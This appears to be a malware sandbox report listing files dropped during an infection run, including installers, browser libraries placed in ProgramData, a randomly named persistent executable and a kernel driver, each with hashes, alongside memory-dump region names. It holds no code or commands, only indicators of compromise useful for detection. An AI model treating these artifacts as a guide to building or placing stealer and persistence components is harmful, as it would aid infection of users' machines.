\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 f6467ee1963861687db66d888022da89
SHA1 e5f3e9b337f4dacb9ea2467e466aea9cc487fa6f
SHA256 5fad7b0e837bfc717899b9d99272da6fed826dab0b3087500078e8fda8e18186
SHA512 70b66cdb372c75fd1b29ea29f97ec57aa3e5553abe6086240fe4d39b75c9217a4e2e6a0f2342ec124f111fc87780a3b91ae3d5a6092f44dfd01df1e462c9e372

memory/2548-189-0x0000000000400000-0x0000000000848000-memory.dmp

memory/1168-190-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2548-192-0x0000000000400000-0x0000000000848000-memory.dmp

memory/2008-193-0x00000000023D0000-0x00000000024D0000-memory.dmp

memory/2008-194-0x0000000000220000-0x000000000022B000-memory.dmp

memory/2008-195-0x0000000000400000-0x00000000022D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\600.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\600.exe

MD5 09b21dda5c40ea29064d2bdc6b59ec40
SHA1 1a8d31b33148e217ba6c6c9ca52e5634e6a30d5e
SHA256 5e3cda29f500a2e9a000dc540eb287a9bfb815f42220d82e54da6289bf8c5a19
SHA512 4911aa0ffda218757bc88039708615d6bfabd35fd0e2a58bcc966ef2beb66dc4f1283ff39f5e3923f95da8495b411162c581c360a35621e15167d9b45daf9ce0

memory/2268-204-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-U9REL.tmp\600.tmp

MD5 8fe7736caca3d3b55bd9123f7d5cd780
SHA1 68158e0909fced212d9076cc891953624e2b401d
SHA256 27821f0047bd4f5f8bfc4939bcb22c110e9de3a852f9589fb253b26b3ec25d94
SHA512 32c20f6f8a0c333dc1aff88bebdf5e46a93711e0e481af92c13156900874b7dfef584633e13761110031d0d52cbc062ba3749b0541a2adf98e1c80f0da264553

\Users\Admin\AppData\Local\Temp\is-VT97H.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-VT97H.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

\Users\Admin\AppData\Local\Temp\is-VT97H.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2216-238-0x00000000003D0000-0x00000000003D1000-memory.dmp

memory/2008-240-0x0000000000400000-0x00000000022D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1961.exe

MD5 fabee0f9fe19eb0b36f858f6e50a3e5a
SHA1 5141fc64dcf23d7fd5df87c916dd1ab467ccaac3
SHA256 3834aa27fbe9a85008659a31f5309391f801c3d33ef59a8a77b8fc78b28b88e2
SHA512 32a1affa2f0a70aec97bf10b4e6f7c593d4e19fccd4804b18e0f01fe5899e52e3ba163392ac5f30ddadfac8d0f9cca043ecee98acf13d1b138aec3afb91292b7

C:\Users\Admin\AppData\Local\Temp\1961.exe

MD5 7985e64a2789ed1f3add16e96e37bf1c
SHA1 e7fd2afcfc1d64e42a7e5296b5d546062a88f377
SHA256 87d2927a16057e179e73758a93f40e310c79b4aed423c335890ffe7cb87a0849
SHA512 8ba212a962b781726beb26a23f1d27ba68de825b3617028d942a48be3b480986898a13a82081b5f81c939e77efa2dc90b2c9478e25309277b7820c3f80b113b5

\Users\Admin\AppData\Local\Temp\nso191E.tmp

MD5 98f75ae139d548677e3c0ff45c24ed08
SHA1 9052843267fd24e8d4dd700d121506a6ccd6935b
SHA256 83764623a1b1038a7b28ac61a156ca7cdeed91f38c0e3ceb211a3e9380cbdfbe
SHA512 a2efd41d8285b4d506058c0d2e7a01a5a053e0e48932835997778b563c47b6762e3f36c2c49c327513f845735132fa4be5ea2a4609a56352c44f181f2a0d8bbb

memory/1708-261-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1752-264-0x00000000023C0000-0x00000000024C0000-memory.dmp

memory/1752-265-0x0000000000220000-0x0000000000254000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/1752-276-0x0000000000400000-0x00000000022DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 43f81d716e1512d3ed487c3bde4966a2
SHA1 42a437fb29e567b137bfae4ff16f7609a3eb72cb
SHA256 e99f92c340ad823896db41dac4c6bdc2be344f6faf0d31a06e7928599da54c9f
SHA512 cd221340cc84b5681664065421f41898aa79960289649d904a4cea354c0b4d5c6c5ced3736a95757647eed7537b1e598a734765616c88a01b72f7157f0fa664c

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 bbf5a2ac4c88c119d625e1a1454632cb
SHA1 e20a65016f765dff8a181091c6fc5e576d1d28c1
SHA256 321152babee255c19931b7d33021dc50b6349afe328a6c3566695756c3341cb0
SHA512 23a1fc44e345aa3aa467aa1f5024b52037a0c4afa67844df31cc6a9b2e98f5fd41ebd64c4c49370270733b63ee087b17f506124ba096a58bc70b3b710dd7fcb3

\ProgramData\nss3.dll

MD5 2e0cd0d3c211342e2ea4533c36e04ad9
SHA1 1589eb32b33d30ede1bc6877874ff10ed4cce9e7
SHA256 3c15faa7fa4bb8d89105c80b594f2647c7de1c865ebcf4c61f8820741e2ba084
SHA512 ad25799455edda65c45f53a3c034ebfdb8c4bee27ff83423ba90e180847f6b55ccc1a3ce357b006b041f54187869a00de122eda4a67acfe1a924f488a9e4aeec

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/1752-374-0x0000000000400000-0x00000000022DC000-memory.dmp

memory/1600-388-0x000000001B220000-0x000000001B502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1961.exe

MD5 bf7711a27b8fcef9e7a68d22222aefcc
SHA1 16d07c74b6cbe06e3fd2046b588b35cc11160f2c
SHA256 9b804662e5b27c816f30f621da3ad7bbbfbf0d409bbe72ba23e4e14e8a37f94f
SHA512 40b680379702799acf6fc073a33ec4e901bd289cd2afde99dc6941953d157806a7612b1b0a23ce4d4232964a3087ec1a3a5d4f80d71fdf288f7986d6b2472eff

memory/1600-390-0x0000000001CE0000-0x0000000001CE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-9JUEJ.tmp\1961.tmp

MD5 d5709c2171e58c1106a886c080be01f8
SHA1 1f7ae64452f9ba78d65c0d4e6a4d0167f26d04d1
SHA256 4f80b4906439bec266cc9f4552f7cfd82bdeac0d7bf29da0040a673cd6576561
SHA512 965d1eca832cbc354717170a42833212da56117485219203758aff248ceb95139ac0a208fe5eb998467307c13e0be3dd6a1b196ef141bd462cc7642c2cdb5ccd

\??\c:\users\admin\appdata\local\temp\is-9juej.tmp\1961.tmp

MD5 c7e0d3c6368634894ca0ca437764e749
SHA1 79e01c1e7aa1fd1917238cee655e25f0c0feb02a
SHA256 b589345c914f5b7ccf8ba14ae0fc3738b20348b345fc3c7aca9e87d7b9b69f66
SHA512 76a1a648782657d76d2b32ad85c52467547f6a235cc0a314a818b0848202087a52684bd6521b2559396163bb24cdd593c428acc04e0777878956201d3f8a799b

C:\Users\Admin\AppData\Local\VSO Inspector\is-RH7SV.tmp

MD5 6231b452e676ade27ca0ceb3a3cf874a
SHA1 f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1
SHA256 9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf
SHA512 f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

memory/1600-418-0x0000000002554000-0x0000000002557000-memory.dmp

memory/2380-422-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 33a1d4cac587bc4187e2363d5afdce5d
SHA1 27c5deef4b8cf79c6a6e36e62eff1c8f2dcc0b7b
SHA256 941cc88e59feb02f02eab36f47e3c884184bff0171c831ceabf0461c3c5341b4
SHA512 2d35b34e51c4319e48739d460c282ae8a54dfb1249bbf7a59c40b72e80e47bedc95fdc5804e19d85c05397491d2f20a324678db01cfbcb934a20145654be19c4

\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 5b5eff124ad3d7da492aa36dfee68fe6
SHA1 8736befb56410c00798dbcb0913ead451fb369e7
SHA256 bca92d61f9fe5527fc26e255bbd27a5b54cd7f983d5168daa4c19fbccdb57eb8
SHA512 3f47fe019324e3a3c8480b4503a64a67559ead7dab4264e31edceac19022b6606a04f568efbaf1a56a44efec9ca46a3513762f05e7b08f126f61115873abfdf7

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 f406fcc34147fde35fad83f4388c0b92
SHA1 2d2732fdfa76de62cf27ce9a0db03ce1a94681bb
SHA256 cc9ae854603bd0733c33acddd27a151649585490d289817c9af606c4fcf672a9
SHA512 860a5302a7ae19661890f7f96a17a47aee87f1655989d57eadd5fe6fbf09b65e1910146eba1d31b5b195b4badf360362c6bdd72c11324146ff985f93db342033

\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b44cc95effcc8b9d7b38cb84842f1c3f
SHA1 8d15cba2ef69b37e69f6ec3551708bcbcb6ac13a
SHA256 d3902d9a34b47eb4a0b9cc3ec3a86072632d3be0953568d8c96b436ca17586f8
SHA512 c807769e9b9cedd909f9d8118e45a34a430fa194f4f3856a0b36cc9291fb44a9a348a59fc82be433ca9b241ba02d06499a897195a38e260a0f8191e9ef1bb5fc

memory/2588-428-0x0000000019C40000-0x0000000019F22000-memory.dmp

memory/2588-431-0x0000000000990000-0x0000000000998000-memory.dmp

memory/1600-421-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

memory/1600-420-0x000000000255B000-0x00000000025C2000-memory.dmp

memory/1600-419-0x000007FEF5290000-0x000007FEF5C2D000-memory.dmp

memory/1780-440-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2588-457-0x000007FEF52C0000-0x000007FEF5C5D000-memory.dmp

memory/2588-480-0x00000000011B0000-0x0000000001230000-memory.dmp

memory/2588-533-0x000007FEF52C0000-0x000007FEF5C5D000-memory.dmp

memory/2588-550-0x00000000011B4000-0x00000000011B7000-memory.dmp

memory/2588-568-0x00000000011B0000-0x0000000001230000-memory.dmp

memory/2588-574-0x000007FEF52C0000-0x000007FEF5C5D000-memory.dmp

memory/2588-613-0x00000000011BB000-0x0000000001222000-memory.dmp

memory/1168-651-0x0000000000240000-0x0000000000241000-memory.dmp

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 cf71d723e6a3a2abdb69313657a0862f
SHA1 9fae6ddc3f0a9e3c874a278435946d83f3f9ab1c
SHA256 ed443d39cd06137b2b8c8a54057b8a855a84960f41c4bb53ed81028293dfe125
SHA512 b140ee2a326a7727c80b3c817f266a6f3299102d113cdecf674f70613e90f83b4466fec1b91a3639cc5722e6d5b6c3baabe46d8dabc330c881a5732b32d36d6e

memory/4052-899-0x0000000000990000-0x0000000000998000-memory.dmp

memory/4052-1296-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp

memory/4052-1351-0x00000000010E4000-0x00000000010E7000-memory.dmp

memory/4052-1377-0x00000000010EB000-0x0000000001152000-memory.dmp

C:\Users\Admin\AppData\Roaming\getvuvu

MD5 7394f4c6c1fd8d8dc1aa26e88959a08b
SHA1 1b20e4a51a66e4c82270e6669547bf47dd966fad
SHA256 5ff0249330e662805cd00089c294494833c800637af670ee25e7abd5079ca66d
SHA512 e3946f65cd60d90d514fa156d0b5c2376ca25b25c73831739314b3537ff8075d98c6dabe020bde03b78ccf7f2862c56eaa08f9979ec6a5a536852b94ee7dd90c

C:\Windows\TEMP\gbfbijmbpkdw.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

memory/5060-2242-0x000007FEF52C0000-0x000007FEF5C5D000-memory.dmp

memory/5060-2278-0x0000000001154000-0x0000000001157000-memory.dmp

memory/5060-2455-0x000000000115B000-0x00000000011C2000-memory.dmp